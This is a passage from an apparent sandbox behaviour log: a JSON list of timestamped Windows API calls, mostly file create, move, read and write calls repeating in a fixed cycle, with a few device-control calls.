"filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,426", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,486", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,486", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:58,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 
17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,516", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,546", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,546", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:58,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:58,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,667", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,677", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,687", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,697", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,707", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:58,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:58,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtSetInformationFile"}, {"category": "filesystem", 